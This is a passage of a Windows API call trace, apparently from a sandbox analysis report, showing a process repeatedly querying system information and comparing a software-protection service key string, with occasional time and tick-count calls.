(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9c8, Length=0x50, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0273.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x28, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0273.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0273.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0273.549] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x28, ResultLength=0x0) [0273.550] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0273.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0273.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0273.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x28, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcc20 | out: lpSystemTimeAsFileTime=0xc751dfcc20*(dwLowDateTime=0x45484fa, dwHighDateTime=0x1d5fb6f)) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb28, Length=0x50, ResultLength=0x0) [0273.560] GetTickCount () returned 0x1184b01 [0273.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x28, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0273.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0273.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.579] NtQuerySystemInformation 